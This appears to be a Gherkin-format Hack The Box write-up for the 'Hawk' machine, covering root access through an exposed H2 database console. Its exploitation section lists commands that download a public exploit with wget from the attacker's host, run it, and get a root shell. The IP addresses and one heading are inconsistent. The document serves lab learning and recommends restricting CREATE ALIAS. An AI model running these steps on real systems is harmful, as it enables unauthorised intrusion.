# Version 1.3.1
# language: en

Feature:
  TOE:
    HTB Hawk Machine
  Page name:
    Hack The Box
  CWE:
    CWE-424: Improper Protection of Alternate Path
  Goal:
    Claiming root ownership of the machine.
  Recommendation:
    Restrict CREATE ALIAS function to db admin users

  Background:
  Hacker's software:
    | <Software name>    | <Version>    |
    | Kali Linux         | 3.30.1       |
    | Firefox ESR        | 60.2.0esr    |
    | OpenVPN            | 2.4.6        |
  TOE information:
    Given I am accessing the site 10.10.10.102
    And enter a php site that allows me to login
    And the server is running Drupal
    And OpenSSH version 7.6p1
    And is running on Linux

  Scenario: Normal use case
  Accessing to the main page of the site as admin.
    Given I access 10.10.10.120
    Then I can see a simple login form
    And I login using the admin credentials
    Then I see the default Drupal admin panel for a simple blog

  Scenario: Dynamic detection
  Anonymous FTP login allowed
    Given I execute the following command:
    """
    nmap -sV -sC -oA nmap/initial 10.10.10.102
    """
    Then I get the output:
    """
    ...
    8082/tcp   open  H2 database http console
    |_http-title H2 Console
    ...
    """
    Then I open 10.10.10.102:8082 in my browser
    And I see the following message:
    """
    Sorry, remote connections ('webAllowOthers') are disabled on this server.
    """
    Then I can conclude that I can access to the database from the machine.

  Scenario: Exploitation
  Obtaining remote code execution in the H2 Console.
    Given I have access to the machine as user
    Then I use an exploit to create a new database in the port
    And then use the default alias to gain access to the conection
    Then I execute the following command in my OS:
    """
    searchsploit -m 45605.py
    mv 45605.py develalopez.py
    """
    Then I get the exploit I will use
    And I open a simple HTTP server in my console at port 80:
    """
    python -m SimpleHTTPServer 80
    """
    Then I execute the following command in the Hawk machine:
    """
    wget http://10.10.14.230/develalopez.py
    """
    And I execute it, specifying objective and port:
    """
    python3 develalopez.py -H localhost:8082
    """
    Then I get the output:
    """
    [*] Attempting to create database
    [+] Created database and logged in
    [*] Sending stage 1
    [*] Shell succeeded - ^c or quit to exit
    """
    Then I execute whoami
    And I see that I am root now
    Then I can conclude that I have access to the system as root
    And I can find and extract the root flag

 Scenario: Extraction
  Extraction of the root flag
    Given I have access to the machine as root
    Then I can access /root and read root.txt
    Then I can conclude that I have root ownership

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.6/10 (High) - AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.3/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.3/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    systems/hackthebox-hawk/unrestricted-dangerous-file-upload
      Given I upload a shell provided by unrestricted-dangerous-file-upload
      When I download the exploit
      Then I get root access
